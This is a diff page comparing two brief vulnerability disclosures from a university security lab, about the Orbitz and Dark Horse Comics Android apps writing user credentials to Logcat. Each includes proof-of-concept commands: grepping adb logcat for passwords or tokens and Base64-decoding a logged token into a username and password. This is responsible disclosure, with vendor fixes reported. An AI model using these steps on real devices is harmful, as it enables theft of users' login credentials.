SHOW:
|
|
- or go back to the newest paste.
1 | - | # Exploit Title: Orbitz Android App - Username/Password Logging |
1 | + | # Title: Dark Horse Comics - Logging Sensitive Information |
2 | - | # Application: Orbitz |
2 | + | # Application: Dark Horse Comics |
3 | - | # Version: 19.31.1 |
3 | + | # Version: 1.3.21 |
4 | - | # Software Link: https://play.google.com/store/apps/details?id=com.orbitz |
4 | + | # Software Link: https://play.google.com/store/apps/details?id=com.darkhorse.digital |
5 | - | # Company: Orbitz |
5 | + | # Company: Dark Horse Comics |
6 | # Installs: 1,000,000+ | |
7 | - | # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz |
7 | + | # Impact: hackers can get username and password of Dark Horse Comics, looking at the log. |
8 | # Category: Mobile Apps | |
9 | # Tested on: Android 9 | |
10 | ||
11 | ---Description--- | |
12 | - | Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. |
12 | + | Dark Horse Comics, the popular comics app installed more than 1 million, stores a user token in Logcat. The user token is the Base64-encoded string from password and username, so by decoding it, hackers can obtain usernames and passwords of the app. |
13 | Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. | |
14 | ||
15 | ||
16 | ---Vendor feedback--- | |
17 | After reporting, the vendor has quickly fixed this problem and released a new version. | |
18 | - | 1. Try to login with Orbitz, entering username and password |
18 | + | |
19 | ---PoC--- | |
20 | - | 2. Search password in Logcat |
20 | + | 1. Try to log in Dark Horse Comics, Android app. |
21 | - | $ adb logcat | grep 'password' |
21 | + | - Opening Login UI |
22 | - | 08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1 |
22 | + | - Enter credentials. Fake information is enough for reproducing. |
23 | - | |
23 | + | |
24 | - | ---Reporter--- |
24 | + | 2. Search the token in the log |
25 | - | Jaeho Lee(Jaeho.Lee@rice.edu) |
25 | + | $ adb logcat | grep 'request with token' |
26 | ||
27 | 09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
28 | ||
29 | 3. Decoding base64 to get a username and password. | |
30 | $ base64 -d | |
31 | amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
32 | jaeho.lee@rice.edu:myfackpassword | |
33 | ||
34 | --Reporter--- | |
35 | Jaeho Lee (Jaeho.Lee@rice.edu) | |
36 | Rice Computer Security Lab | |
37 | Rice University |